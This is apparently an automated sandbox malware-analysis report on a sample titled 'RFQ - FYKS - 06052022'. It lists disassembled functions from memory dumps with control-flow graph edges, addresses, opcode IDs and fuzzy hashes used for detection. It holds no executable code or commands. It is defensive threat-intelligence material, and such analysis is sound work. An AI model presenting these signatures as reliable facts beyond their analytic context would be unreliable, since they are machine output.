                                                                                        control_flow_graph 909 572a370-572a382 912 572a3e2-572a3eb 909->912 913 572a384-572a392 909->913 914 572a3f5-572a420 912->914 915 572a3ed-572a3f3 912->915 916 572a394-572a397 913->916 917 572a399 913->917 931 572a422 914->931 932 572a42e-572a43c 914->932 915->914 918 572a39b-572a3a0 916->918 917->918 919 572a3a2-572a3a8 918->919 920 572a3bc-572a3c1 918->920 923 572a3aa 919->923 924 572a3ad-572a3b9 919->924 925 572a3c3-572a3c6 920->925 926 572a3d0-572a3d3 920->926 923->924 925->926 959 572a3d5 call 572a370 926->959 960 572a3d5 call 572a35f 926->960 929 572a3db-572a3df 933 572a424-572a425 931->933 934 572a429-572a42d 931->934 935 572a4a5-572a4ae 932->935 936 572a43e-572a449 932->936 937 572a427 933->937 938 572a49d-572a4a2 933->938 934->932 941 572a4b0-572a4b6 935->941 942 572a4b8-572a544 935->942 939 572a450 936->939 940 572a44b-572a44e 936->940 937->934 943 572a452-572a457 939->943 940->943 941->942 946 572a481-572a486 943->946 947 572a459-572a45f 943->947 950 572a494-572a498 call 572a090 946->950 951 572a488-572a48a 946->951 948 572a461-572a464 947->948 949 572a466 947->949 952 572a468-572a47e 948->952 949->952 950->938 951->950 959->929 960->929
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8ck
                                                                                        • API String ID: 0-1441298866
                                                                                        • Opcode ID: e35b499e5430bcfc349bb94cf85d30d3a5154c3194cb05d2d5d68c55d972f812
                                                                                        • Instruction ID: fcb965672ea4fc4d43bd4a8c0021fd9b829485c113086ba140633fa3554816bb
                                                                                        • Opcode Fuzzy Hash: e35b499e5430bcfc349bb94cf85d30d3a5154c3194cb05d2d5d68c55d972f812
                                                                                        • Instruction Fuzzy Hash: E751167270D3608FCB15DB3DD458A6ABBA2EB8626071980AEE805CF352EAB5DC01D750
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05728030 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 999 5728030-572804a 1003 5728051 999->1003 1004 572804c-572804e 999->1004 1005 5728053-572805a 1003->1005 1006 57280be-57280d9 1003->1006 1004->1003 1007 5728061-57288ab 1005->1007 1008 572805c 1005->1008 1017 5728151 1006->1017 1018 57280db-572811c 1006->1018 1015 57288b4-57288c8 1007->1015 1016 57288ad-57288b3 1007->1016 1008->1007 1016->1015 1019 5728153-572815a 1017->1019 1020 57281c9-57281d1 1017->1020 1022 572815c-5728160 1019->1022 1023 57281d3-57281d7 1020->1023 1024 57281dd-57281e2 1020->1024 1022->1022 1026 5728162-572816a 1022->1026 1023->1024 1027 57282a8-57282b2 1023->1027 1028 57281e4-57281ea 1024->1028 1029 57281f9-57281fe 1024->1029 1036 5728171-572817e 1026->1036 1037 572816c-572817e 1026->1037 1031 57282b4-57282ba 1027->1031 1032 57282bd-572834b 1027->1032 1033 5728352-572835c 1028->1033 1034 57281f0-57281f3 1028->1034 1031->1032 1032->1033 1038 5728367-572840a 1033->1038 1039 572835e-5728364 1033->1039 1034->1029 1034->1033 1040 5728188-572818e 1036->1040 1037->1040 1086 5728411-5728413 1038->1086 1087 572840c-572840e 1038->1087 1039->1038 1047 5728195-5728197 1040->1047 1050 5728199-572819e 1047->1050 1051 572819f-57281ad 1047->1051 1056 57281b5-57281ba 1051->1056 1057 57281af-57281b4 1051->1057 1058 57281c2-57281c5 1056->1058 1059 57281bc-57281c1 1056->1059 1062 57281c7-57281ca 1058->1062 1063 57281ff-5728208 1058->1063 1062->1024 1064 57281cc-57281d1 1062->1064 1065 5728212-57282a1 1063->1065 1066 572820a-5728210 1063->1066 1064->1023 1064->1024 1065->1027 1066->1065 1089 5728415-572847f 1086->1089 1088 5728410 1087->1088 1087->1089 1088->1086
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :|v&
                                                                                        • API String ID: 0-1213271392
                                                                                        • Opcode ID: a9bf3c48da4485f2aa2cc70cafa4f28fca4cb8d4c8f8d226892dd5536027a4ca
                                                                                        • Instruction ID: 97b428e08bc5eaf9d064f5772184bb19e36e12c9c626ca83d11e2412c95e58bd
                                                                                        • Opcode Fuzzy Hash: a9bf3c48da4485f2aa2cc70cafa4f28fca4cb8d4c8f8d226892dd5536027a4ca
                                                                                        • Instruction Fuzzy Hash: 8B510B71C0D3648FCB11EF69D8506DABFB0FF46224F05449BD445DB652E3359848DBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05728DEB Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1111 5728deb-5728df2 1112 5728df4 1111->1112 1113 5728df9-5728e58 1111->1113 1114 5728df6-5728df7 1112->1114 1115 5728e65-5728e82 1112->1115 1114->1113 1119 5728e8a-5728e8e 1115->1119
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8ck
                                                                                        • API String ID: 0-1441298866
                                                                                        • Opcode ID: 114c78373d73f8a3ac2a083b5c63ce3d6f34f6673f10b29d785903c4fd5a1ab6
                                                                                        • Instruction ID: 5e2b2a79435092a4b6bb60f30c2777447cb3fc41cec4e72822dc5ee22fde374c
                                                                                        • Opcode Fuzzy Hash: 114c78373d73f8a3ac2a083b5c63ce3d6f34f6673f10b29d785903c4fd5a1ab6
                                                                                        • Instruction Fuzzy Hash: 86119A753047119BC324EF39E591A16BBA2BF852583408A6ED519CB726DB31FC09C7A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0572CDD3 Relevance: .4, Instructions: 353COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ccc6419b0769cadc100ba54a8edcae48d8ba21208bc7170088ebdbdc18c786a7
                                                                                        • Instruction ID: 3872df5f337f3f1baa2717e463e5b8431499dbfa70af309a5ac05b4de994ab6e
                                                                                        • Opcode Fuzzy Hash: ccc6419b0769cadc100ba54a8edcae48d8ba21208bc7170088ebdbdc18c786a7
                                                                                        • Instruction Fuzzy Hash: A7E15D70A05219DFDB24DFA4D098AADBBF2FF94314F518868E4069F3A4CB31AC46DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0572F150 Relevance: .3, Instructions: 297COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 78c20c01359d0f6b1f2bbdd6a6941fe58718e7ded7c627d23f4275723ed287d4
                                                                                        • Instruction ID: fe5be5aacf212d600cfdfa6e04adb90c89cbae469360a5bf0d2c37b9144e948a
                                                                                        • Opcode Fuzzy Hash: 78c20c01359d0f6b1f2bbdd6a6941fe58718e7ded7c627d23f4275723ed287d4
                                                                                        • Instruction Fuzzy Hash: 72A1CF35B096218FC728DF69E495A6DB7F2FF85710B15806AE80ACB361CB71EC41DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 057267CD Relevance: .3, Instructions: 276COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2d33368c0a7252c468c75ce77723e3677ba6a257cae534082517241ad64282f8
                                                                                        • Instruction ID: fd98a7618427ff36e83f90334e546f460fe17f9ae586af7cfd00f8a946f985a1
                                                                                        • Opcode Fuzzy Hash: 2d33368c0a7252c468c75ce77723e3677ba6a257cae534082517241ad64282f8
                                                                                        • Instruction Fuzzy Hash: 26A12A72E0D3905FCB02BB74D8706DD7F72AF96214F1A44ABD491CB293EA349848D761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0578F548 Relevance: .2, Instructions: 221COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367207694.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5780000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 520d225adf58b8f6e35d337897eba5207daacf7d6bb9df2cfc50b638980b41f3
                                                                                        • Instruction ID: e6bb12f2c8ca0b1c6f4605afb43c1cc0a67b56b8f4ade526525a9920e59eb111
                                                                                        • Opcode Fuzzy Hash: 520d225adf58b8f6e35d337897eba5207daacf7d6bb9df2cfc50b638980b41f3
                                                                                        • Instruction Fuzzy Hash: 7F815A347545058FDB08EF29C494ABA7BE6FF88304F1581A9E906CB3A1CB34EC41DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05723850 Relevance: .2, Instructions: 218COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 13ee923c8de499c1efb60b1f90608c435893072ee2def19dcf48a20271b9586d
                                                                                        • Instruction ID: ba89b4049890e81cbaa64c9bc2404542f30c92e7ec76d22f7b47701e21af46c0
                                                                                        • Opcode Fuzzy Hash: 13ee923c8de499c1efb60b1f90608c435893072ee2def19dcf48a20271b9586d
                                                                                        • Instruction Fuzzy Hash: 61711370B042049FCB14DF79D894AAD7BB2EF81200F55886AE446CF391DF35EC068B91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0578F800 Relevance: .2, Instructions: 203COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367207694.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5780000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9a6b2cb9c4b7427f420c2ab040375199a07253612ddda031015960b71190578f
                                                                                        • Instruction ID: a1c05e680f285d7d5020dfd68c99a76bf40db7d26c4bfbb4a5df2ec21ab29c7d
                                                                                        • Opcode Fuzzy Hash: 9a6b2cb9c4b7427f420c2ab040375199a07253612ddda031015960b71190578f
                                                                                        • Instruction Fuzzy Hash: F6813A34A042089FDB14DFA8D598BADBBF2FF48314F1484A9E805EB360DB35AD40DB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0572CC00 Relevance: .2, Instructions: 199COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 68fdf92f814eb1304c069f519b9e2fd6d51f4331de96db5bebb1a473d375024d
                                                                                        • Instruction ID: fbac43d78decaeb0b8daa6ff87d3da21e50428b8267f0ff4ecc1f7a1857faaf4
                                                                                        • Opcode Fuzzy Hash: 68fdf92f814eb1304c069f519b9e2fd6d51f4331de96db5bebb1a473d375024d
                                                                                        • Instruction Fuzzy Hash: F5815B74A05219DFCB25DFA8C498AADBBF6FF48310F14806AE806EB354CB30AC45DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05721D88 Relevance: .2, Instructions: 195COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8048220c0b024f5a6150d5bca359fba0aaa4bfae616d9ffd9d7fca0c6985e5af
                                                                                        • Instruction ID: 4cc29baf434e034ece21e53c9083a574d8169cbad60cb716e1bde544133bafe4
                                                                                        • Opcode Fuzzy Hash: 8048220c0b024f5a6150d5bca359fba0aaa4bfae616d9ffd9d7fca0c6985e5af
                                                                                        • Instruction Fuzzy Hash: 40718874A022159FCB18CF69D494AADBBF3FF98310B608069E8069B351DB35ED42DB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0578F538 Relevance: .2, Instructions: 194COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367207694.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5780000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5aeb6c7160e427c4e62b0dffae115a7f0bfe9206661497b6f94740eb6fc39e42
                                                                                        • Instruction ID: b700f964bbb884dbcd87e5bfadbb9764cfec1fa9e111842a7ee2bfc46b4c6756
                                                                                        • Opcode Fuzzy Hash: 5aeb6c7160e427c4e62b0dffae115a7f0bfe9206661497b6f94740eb6fc39e42
                                                                                        • Instruction Fuzzy Hash: 207138347546059FDB04EF69C494ABA7BE6FF88304F1581A9E906CB3A1CB34EC05DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0578E8E8 Relevance: .2, Instructions: 164COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367207694.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5780000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 94dd5062e8afd35421b88e803ee475d6e38d8a64e048b197db260f42eed40f22
                                                                                        • Instruction ID: 470d7dd79ed24914f0f0600d3651183cba62ba71ba8a743ca832c21283e8ee59
                                                                                        • Opcode Fuzzy Hash: 94dd5062e8afd35421b88e803ee475d6e38d8a64e048b197db260f42eed40f22
                                                                                        • Instruction Fuzzy Hash: C2713E34A10218CFCB04EFA8D5889ADBBB6FF88714F158559E801AB365DB70EC46DF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05724B50 Relevance: .2, Instructions: 161COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 441ce347ee61e5c9d712e1150ba96d5c23cf3b9a4b9beeb58ca0908584811f4b
                                                                                        • Instruction ID: 4936dc71e7d6654a65366770f92404c55994bbf52fd15284397037cdcf3ef105
                                                                                        • Opcode Fuzzy Hash: 441ce347ee61e5c9d712e1150ba96d5c23cf3b9a4b9beeb58ca0908584811f4b
                                                                                        • Instruction Fuzzy Hash: CD515634B052148FDB14DB69D498AAA7BF3EF89224F195068E906EB3A0DF35DC81DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05729F48 Relevance: .2, Instructions: 160COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f21b2e24a52734fb2934dbd651365ee01e23d02d6b332eb650bfad505274092e
                                                                                        • Instruction ID: 8ecd65748d4c865deb3142b2b08f85e06c9c90f13c75ee13b6718d775bd9307d
                                                                                        • Opcode Fuzzy Hash: f21b2e24a52734fb2934dbd651365ee01e23d02d6b332eb650bfad505274092e
                                                                                        • Instruction Fuzzy Hash: F251D1317052108FC7249B79E858A6EBBE6FFC8625B18847DE90AC7751EF71EC028791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05724AB0 Relevance: .2, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 325c48a70bcf06ec43d11ea1ad7b4aca3fd026c824ed2af2297c798bfaf40c5f
                                                                                        • Instruction ID: aaa13e095dac1ec7bd25bb15aa502072e6f88f10c605de143c284db9986a07c0
                                                                                        • Opcode Fuzzy Hash: 325c48a70bcf06ec43d11ea1ad7b4aca3fd026c824ed2af2297c798bfaf40c5f
                                                                                        • Instruction Fuzzy Hash: 1F51AD34A053589FCB15CF69C495AAD7FF2FF49210F1850A9E806DB3A1DB319C85DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05728B70 Relevance: .2, Instructions: 154COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 64bb80b0015416e4b97fd261eb3b44ee534b61564a39385e20ec65265f93065f
                                                                                        • Instruction ID: ae6e2be67d6e413b6239297fe0f1ba8077ab85163b89cea58b38c50a0854f037
                                                                                        • Opcode Fuzzy Hash: 64bb80b0015416e4b97fd261eb3b44ee534b61564a39385e20ec65265f93065f
                                                                                        • Instruction Fuzzy Hash: 714141307092106FC714AB79E85452D7BE6EFC525071984BEE509CB391DF32DC0687A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0578EB50 Relevance: .2, Instructions: 154COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367207694.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5780000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e2deda8fa43fafddc835aab3156810ed8b4099c028cbdf29d60b65cb3b7a6579
                                                                                        • Instruction ID: 27f41584feb333234f75527b8418e9790927b29693f184aec50c004df95263a0
                                                                                        • Opcode Fuzzy Hash: e2deda8fa43fafddc835aab3156810ed8b4099c028cbdf29d60b65cb3b7a6579
                                                                                        • Instruction Fuzzy Hash: 2951C030B042049FCB15EB35C888ABE37A6FF85214B544469E906DB390EF35EC46D7A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0578FD80 Relevance: .1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367207694.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5780000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 728cb3c471120c47819924480a8c8f332931e43d770514c9c099e972bc67adfd
                                                                                        • Instruction ID: 7655080908348f251bb0fc8b90e6b99728ceaec7229a04a1adfcfc30da5a8c97
                                                                                        • Opcode Fuzzy Hash: 728cb3c471120c47819924480a8c8f332931e43d770514c9c099e972bc67adfd
                                                                                        • Instruction Fuzzy Hash: 954188EBD002C2BBCA20D621DC0BE972D7DDAF3614B18405D754EE6B52E260D52CE5E5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0572CBF1 Relevance: .1, Instructions: 134COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9813b7db2e59a532463365698903dd0a433b2211ce84c970b67185abea7ceb15
                                                                                        • Instruction ID: 7dd3ad6aa1bc924250cca8a24d82f0e0f497ecaeed7c3272bbd0029a20005ef3
                                                                                        • Opcode Fuzzy Hash: 9813b7db2e59a532463365698903dd0a433b2211ce84c970b67185abea7ceb15
                                                                                        • Instruction Fuzzy Hash: 6B515F74A06218DFCB25DFA5D488AADBBF6FF98310F548469E806EB354DB30AC41DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0572A900 Relevance: .1, Instructions: 132COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c017496e704181619a6267d4b41d40132b7905cbaa23d594fc68f0a0dd50c633
                                                                                        • Instruction ID: e3c30ec00aaeb0484b2619ba72ab07577d6a0ef7d27eca953868a602d55eb4cb
                                                                                        • Opcode Fuzzy Hash: c017496e704181619a6267d4b41d40132b7905cbaa23d594fc68f0a0dd50c633
                                                                                        • Instruction Fuzzy Hash: A35178307066158FCB25DF25E99892EBBF2FF88211B15C429E842C7259DF30ED02DBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0572D1D8 Relevance: .1, Instructions: 123COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb26ad1d4bd0b6e266e78e6cce2b83d7b0ab7b9caad07073155bf743017e78bc
                                                                                        • Instruction ID: 2abb7912ddff9c766a555a1627abe9d7715b72cef05745c1789d2fb230ddfa67
                                                                                        • Opcode Fuzzy Hash: fb26ad1d4bd0b6e266e78e6cce2b83d7b0ab7b9caad07073155bf743017e78bc
                                                                                        • Instruction Fuzzy Hash: 17512874A05219DFCB14DFA5D898AADBBB6FF98310F148019E406AB3A8DB70AC45DF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 057268E8 Relevance: .1, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 38f321f45c3d37fa619dbfbfd7421f4399e65c9f280f79fd3d9c93cdfdafc30d
                                                                                        • Instruction ID: f5b56238a2a5caf22553b09d8de18007b98ad6ef5d58a30dd5271edf9443e237
                                                                                        • Opcode Fuzzy Hash: 38f321f45c3d37fa619dbfbfd7421f4399e65c9f280f79fd3d9c93cdfdafc30d
                                                                                        • Instruction Fuzzy Hash: 4D41AF34B002199FCF14DBA5D8945ADBBB3FF98210B24812AE906A7395DF709C05DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05725DF0 Relevance: .1, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2f263d626b1a3ef559f4ecb9a1d25e6356f7b887bb19714aed05044a7d67d469
                                                                                        • Instruction ID: 006f58d25914673e2778ddb0cd68e8491c70c38080b9848ce34c25771e1d2c79
                                                                                        • Opcode Fuzzy Hash: 2f263d626b1a3ef559f4ecb9a1d25e6356f7b887bb19714aed05044a7d67d469
                                                                                        • Instruction Fuzzy Hash: C641BF74B04214AFDB24AB78D449BAA7BA6EB89710F14842DE506DF380DF71AC42CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0572ED70 Relevance: .1, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e8689e2aac0bfc1b8f4fad8038b478790f704f538aabb8a1aba373baae4e40ba
                                                                                        • Instruction ID: 751ec264f9cc8554a39ea278eb33bf8ba1eceb3a04c8980ee1ee9ca01bd6b4da
                                                                                        • Opcode Fuzzy Hash: e8689e2aac0bfc1b8f4fad8038b478790f704f538aabb8a1aba373baae4e40ba
